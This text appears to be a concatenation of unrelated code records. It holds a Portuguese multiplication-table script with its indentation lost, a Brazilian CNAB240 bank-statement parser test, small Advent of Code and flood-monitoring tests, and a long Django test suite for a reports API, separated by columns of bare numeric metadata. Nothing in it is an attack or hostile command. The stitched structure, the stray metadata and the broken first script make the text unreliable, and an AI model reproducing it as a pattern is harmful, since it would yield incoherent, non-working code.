for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 1:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 2:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 3:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 4:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 5:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 6:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 7:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 8:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 9:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
if escolha == 10:
for i in range(11):
print('{} x {} = {}'.format(escolha, i, escolha*i))
saida = input('Deseja Fazer mais uma operação?[s/n]')
if saida == 'n':
break
| 36.4
| 73
| 0.468407
| 194
| 1,456
| 3.515464
| 0.216495
| 0.258065
| 0.096774
| 0.177419
| 0.793255
| 0.793255
| 0.793255
| 0.793255
| 0.793255
| 0.793255
| 0
| 0.036697
| 0.326236
| 1,456
| 39
| 74
| 37.333333
| 0.658512
| 0
| 0
| 0.564103
| 0
| 0
| 0.162775
| 0.015797
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.307692
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ee416b467ffc201530f2413c5300d28e15c9c30b
| 5,129
|
py
|
Python
|
tests/statement/test_statement.py
|
netosjb/febraban-python
|
a546fa3353d2db1546df60f6f8cc26c7c862c743
|
[
"MIT"
] | 3
|
2021-05-04T16:07:24.000Z
|
2022-03-06T22:08:37.000Z
|
tests/statement/test_statement.py
|
netosjb/febraban-python
|
a546fa3353d2db1546df60f6f8cc26c7c862c743
|
[
"MIT"
] | 2
|
2021-03-01T00:06:57.000Z
|
2021-03-01T00:14:55.000Z
|
tests/statement/test_statement.py
|
netosjb/febraban-python
|
a546fa3353d2db1546df60f6f8cc26c7c862c743
|
[
"MIT"
] | 1
|
2021-08-18T03:05:43.000Z
|
2021-08-18T03:05:43.000Z
|
from unittest.case import TestCase
from febraban.cnab240.statement import StatementParser
returnFile = \
"""
07700000 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA BANCO INTER S.A. 21211202016361800001610100000 000
07700011E0440033 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 17082020000000000000732846CFBRL00016
0770001300001E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S1908202019082020000000000000082240D1127059PAGAMENTO DE TITULO 026135
0770001300002E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2008202020082020000000000000264357D1127045PAGAMENTO DE CONVENIO 000000
0770001300003E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2008202020082020000000000000433675D1127045PAGAMENTO DE CONVENIO 000000
0770001300004E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2008202020082020000000000000084054D1127045PAGAMENTO DE CONVENIO 000000
0770001300005E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2008202020082020000000000000200000C2067211RESGATE 672827
0770001300006E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000144000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300007E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000600000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300008E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000100000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300009E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000131800C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300010E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000098000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300011E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000080000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300012E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2408202024082020000000000000300000D1207065TED ENVIADA 025012
0770001300013E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2508202025082020000000000000076900C2097067TED RECEBIDA 671091
07700015 223130935000198 0000190000014054310 00000000000000000000000000000000000000000000000000000025082020000000000000999220CF000015000000000001164326000000000001430700
07799999 000001000017000001
""".strip()
class ParserTest(TestCase):
def testReturnStatementFile(self):
statement = StatementParser.parseText(returnFile)
debit = 0
credit = 0
for line in statement.lines:
if line.debit_credit == 'D':
debit += line.amountInCents
elif line.debit_credit == 'C':
credit += line.amountInCents
self.assertEqual(statement.debit_sum_in_cents, debit)
self.assertEqual(statement.credit_sum_in_cents, credit)
| 122.119048
| 646
| 0.501267
| 234
| 5,129
| 10.952991
| 0.384615
| 0.212251
| 0.222396
| 0.286773
| 0.320328
| 0.27897
| 0
| 0
| 0
| 0
| 0
| 0.61202
| 0.487424
| 5,129
| 41
| 647
| 125.097561
| 0.362876
| 0
| 0
| 0
| 0
| 0
| 0.003231
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.0625
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ee74dde96e9e05652b6a3ba3f63b7172aab82fb5
| 263
|
py
|
Python
|
day8/test_day8.py
|
hmcc/advent-of-code-2020
|
827c952c30aca2e72fb37818050fba1076095161
|
[
"MIT"
] | null | null | null |
day8/test_day8.py
|
hmcc/advent-of-code-2020
|
827c952c30aca2e72fb37818050fba1076095161
|
[
"MIT"
] | null | null | null |
day8/test_day8.py
|
hmcc/advent-of-code-2020
|
827c952c30aca2e72fb37818050fba1076095161
|
[
"MIT"
] | null | null | null |
from day8 import day8
def test_parse_line_nop():
assert day8.parse_line('nop +0') == ['nop', 0]
def test_parse_line_acc():
assert day8.parse_line('acc +1') == ['acc', 1]
def test_parse_line_jmp():
assert day8.parse_line('jmp -3') == ['jmp', -3]
| 18.785714
| 51
| 0.638783
| 43
| 263
| 3.627907
| 0.325581
| 0.346154
| 0.230769
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050691
| 0.174905
| 263
| 13
| 52
| 20.230769
| 0.668203
| 0
| 0
| 0
| 0
| 0
| 0.102662
| 0
| 0
| 0
| 0
| 0
| 0.428571
| 1
| 0.428571
| true
| 0
| 0.142857
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
ee7ba0619ad0f7e20788ca57030405a8d82cd98a
| 268
|
py
|
Python
|
test_inconsistent_typical_range_stations.py
|
cued-ia-computing/flood-jdv24-ahw41
|
b8d62b33281dfb01aec569998b88769ca6d06556
|
[
"MIT"
] | null | null | null |
test_inconsistent_typical_range_stations.py
|
cued-ia-computing/flood-jdv24-ahw41
|
b8d62b33281dfb01aec569998b88769ca6d06556
|
[
"MIT"
] | null | null | null |
test_inconsistent_typical_range_stations.py
|
cued-ia-computing/flood-jdv24-ahw41
|
b8d62b33281dfb01aec569998b88769ca6d06556
|
[
"MIT"
] | null | null | null |
from floodsystem.station import inconsistent_typical_range_stations
from testingData import getFakeData
def test_inconsistent_typical_range_stations():
stations = getFakeData()
assert inconsistent_typical_range_stations(stations) == ['Garret Hostel Bridge']
| 33.5
| 84
| 0.835821
| 29
| 268
| 7.37931
| 0.551724
| 0.266355
| 0.336449
| 0.448598
| 0.373832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108209
| 268
| 7
| 85
| 38.285714
| 0.895397
| 0
| 0
| 0
| 0
| 0
| 0.074627
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| false
| 0
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ee913e64372dd2a769a46890fceb4004e49eb511
| 222,279
|
py
|
Python
|
reports/tests/test_api.py
|
CMU-TRP/podd-api
|
6eb5c4598f848f75d131287163cd9babf2a0a0fc
|
[
"MIT"
] | 3
|
2020-04-26T06:28:50.000Z
|
2021-04-05T08:02:26.000Z
|
reports/tests/test_api.py
|
CMU-TRP/podd-api
|
6eb5c4598f848f75d131287163cd9babf2a0a0fc
|
[
"MIT"
] | 10
|
2020-06-05T17:36:10.000Z
|
2022-03-11T23:16:42.000Z
|
reports/tests/test_api.py
|
CMU-TRP/podd-api
|
6eb5c4598f848f75d131287163cd9babf2a0a0fc
|
[
"MIT"
] | 5
|
2021-04-08T08:43:49.000Z
|
2021-11-27T06:36:46.000Z
|
# -*- encoding: utf-8 -*-
import datetime
import json
import urllib2
from django.conf import settings
from django.core.files import File
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.test.client import encode_multipart
from django.utils import timezone
from mock import patch
from mock import mock_open
from mockredis import mock_strict_redis_client
from rest_framework.test import APITestCase
from common import factory
from common.constants import (PRIORITY_FOLLOW, GROUP_WORKING_TYPE_REPORT_TYPE,
GROUP_WORKING_TYPE_ADMINSTRATION_AREA, GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA,
GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE, USER_STATUS_ADDITION_VOLUNTEER, SUPPORT_LIKE_ME_TOO_COMMENT,
SUPPORT_COMMENT, SUPPORT_LIKE_ME_TOO, SUPPORT_LIKE, SUPPORT_ME_TOO)
from flags.models import Flag
from mentions.models import Mention
from notifications.models import Notification
from reports.models import Report, ReportImage, ReportComment, ReportType, ReportAbuse
from reports.tests.test_models import common_public_setup
from summary.tests.test_api import order_list_by_id
def mock_upload_to_s3(file):
return file.name
def get_temporary_file():
m = mock_open()
with patch('__main__.open', m, create=True):
temporary_file = open('/tmp/hello.world.jpg', 'w')
file = File(temporary_file)
file.write(urllib2.urlopen('http://www.yespetshop.com/private_folder/kitten-1.jpg').read())
file.closed
temporary_file.closed
return temporary_file
get_temporary_file()
def get_large_temporary_file():
m = mock_open()
with patch('__main__.open', m, create=True):
temporary_file = open('/tmp/hello_large.world', 'w')
file = File(temporary_file)
file.write(urllib2.urlopen('http://www.nasa.gov/pdf/703154main_earth_art-ebook.pdf').read())
file.closed
temporary_file.closed
return temporary_file
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportList(APITestCase):
def setUp(self):
try:
self.default_positive_type = ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
self.default_positive_type = ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.yoona)
self.authority_1 = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority_2 = factory.create_authority()
self.authority.users.add(self.jessica)
self.type1 = factory.create_report_type(authority=self.authority)
self.type2 = factory.create_report_type(authority=self.authority)
self.type3 = factory.create_report_type(authority=self.authority_2)
self.area1 = factory.create_administration_area(authority=self.authority_1)
self.area2 = factory.create_administration_area(authority=self.authority_1)
self.area3 = factory.create_administration_area(authority=self.authority_2)
self.authority_1.inherits.add(self.authority)
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
administration_area=self.area2, form_data={
"symptom": u"cough,ปวดหัว,stiff",
"sickCount": 5,
}, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area1, date=datetime.datetime(2014, 11, 11, 12, 30, 45))
self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
administration_area=self.area2, date=datetime.datetime(2014, 11, 9, 13, 30, 45))
self.report4 = factory.create_report(type=self.type3, administration_area=self.area2)
self.report5 = factory.create_report(type=self.type1, administration_area=self.area3)
self.flag = factory.create_flag(report=self.report1, priority=1, flag_owner=self.taeyeon)
def test_api_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['reportId'], self.report2.report_id)
self.assertEqual(report1['guid'], self.report2.guid)
self.assertEqual(report1['reportTypeId'], self.report2.type.id)
self.assertEqual(report1['administrationAreaId'], self.report2.administration_area.id)
self.assertEqual(report1['negative'], self.report2.negative)
self.assertEqual(report1['createdByName'], self.report2.created_by.get_full_name())
self.assertEqual(report1['date'], self.report2.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report2.incident_date.strftime('%Y-%m-%d'))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['reportId'], self.report3.report_id)
self.assertEqual(report2['guid'], self.report3.guid)
self.assertEqual(report2['reportTypeId'], self.report3.type.id)
self.assertEqual(report2['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report2['negative'], self.report3.negative)
self.assertEqual(report2['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report2['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['reportId'], self.report1.report_id)
self.assertEqual(report3['guid'], self.report1.guid)
self.assertEqual(report3['reportTypeId'], self.report1.type.id)
self.assertEqual(report3['administrationAreaId'], self.report1.administration_area.id)
self.assertEqual(report3['negative'], self.report1.negative)
self.assertEqual(report3['createdByName'], self.report1.created_by.get_full_name())
self.assertEqual(report3['date'], self.report1.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report3['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
def test_api_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['reportId'], self.report2.report_id)
self.assertEqual(report1['guid'], self.report2.guid)
self.assertEqual(report1['reportTypeId'], self.report2.type.id)
self.assertEqual(report1['administrationAreaId'], self.report2.administration_area.id)
self.assertEqual(report1['negative'], self.report2.negative)
self.assertEqual(report1['createdByName'], self.report2.created_by.get_full_name())
self.assertEqual(report1['date'], self.report2.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report2.incident_date.strftime('%Y-%m-%d'))
# self.assertEqual(report1['flag'], '')
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['reportId'], self.report3.report_id)
self.assertEqual(report2['guid'], self.report3.guid)
self.assertEqual(report2['reportTypeId'], self.report3.type.id)
self.assertEqual(report2['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report2['negative'], self.report3.negative)
self.assertEqual(report2['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report2['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
# self.assertEqual(report2['flag'], '')
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['reportId'], self.report1.report_id)
self.assertEqual(report3['guid'], self.report1.guid)
self.assertEqual(report3['reportTypeId'], self.report1.type.id)
self.assertEqual(report3['administrationAreaId'], self.report1.administration_area.id)
self.assertEqual(report3['negative'], self.report1.negative)
self.assertEqual(report3['createdByName'], self.report1.created_by.get_full_name())
self.assertEqual(report3['date'], self.report1.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report3['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
# self.assertEqual(report3['flag'], '1')
def test_api_report_with_pagination(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'page_size': 2
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 2)
params = {
'page_size': 2,
'page': 2
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 1)
def test_api_report_with_pagination_wih_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
'page_size': 2
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 2)
params = {
'page_size': 2,
'page': 2
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 1)
def test_api_return_report_only_administration_area_in_group_role_reporter(self):
group_a = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
area = factory.create_administration_area()
factory.create_group_administration_area(group=group_a, administration_area=area)
report = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
def test_api_return_report_only_report_type_in_group_role_reporter(self):
group_r = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
newtype = factory.create_report_type()
factory.create_group_report_type(group=group_r, report_type=newtype)
report = factory.create_report(created_by=self.taeyeon, type=newtype,
administration_area=self.area2)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
def test_api_report_with_form_data(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'withFormData': True
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['formData'], json.loads(self.report2.form_data))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['formData'], json.loads(self.report3.form_data))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['formData'], json.loads(self.report1.form_data))
def test_api_report_with_form_data_and_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
'withFormData': True
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['formData'], json.loads(self.report2.form_data))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['formData'], json.loads(self.report3.form_data))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['formData'], json.loads(self.report1.form_data))
'''
def test_api_report_list_will_return_report_that_area_is_child_of_permitted_administration_area(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area,
date=datetime.datetime(2014, 10, 9, 13, 30, 45))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
report4 = response_json['results'][3]
self.assertEqual(report4['id'], report.id)
def test_api_report_list_will_return_report_that_area_is_child_of_permitted_administration_area_with_authority(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
report = factory.create_report(type=self.type1, administration_area=area,
date=datetime.datetime(2014, 10, 9, 13, 30, 45))
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 4)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
report4 = response_json['results'][3]
self.assertEqual(report4['id'], report.id)
'''
def test_api_report_filter_by_user(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'createdBy': self.taeyeon.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report1.id)
def test_api_report_filter_by_user_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'createdBy': self.taeyeon.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report1.id)
def test_api_report_filter_by_report_type(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'type': self.type2.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_filter_by_report_type_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'type': self.type2.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_filter_by_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'administrationArea': self.area1.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_filter_by_administration_area_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'administrationArea': self.area1.id
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
def test_api_report_filter_by_form_data(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom': u'ปวดหัว'
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
response = self.client.get(reverse('report-list'), {
'symptom': 'fever'
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_filter_by_form_data_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom': u'ปวดหัว'
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
response = self.client.get(reverse('report-list'), {
'symptom': 'fever'
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 2)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
def test_api_report_filter_multiple_value_in_one_field(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom__in': [u'ปวดหัว', 'fever'],
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_filter_multiple_value_in_one_field_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom__in': [u'ปวดหัว', 'fever'],
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_filter_multiple_value_in_one_field_part_2(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list') + u'?symptom__in=stiff&symptom__in=fever')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_filter_multiple_value_in_one_field_part_2_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list') + u'?symptom__in=stiff&symptom__in=fever')
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
def test_api_report_filter_greater_than_value(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'sickCount__gt': 4,
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_filter_greater_than_value_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'), {
'sickCount__gt': 4,
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report1.id)
def test_api_report_filter_multiple_data(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'), {
'symptom': 'fever',
'createdBy': self.taeyeon.id,
'type': self.type1.id,
'administrationArea': self.area1.id,
})
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 1)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
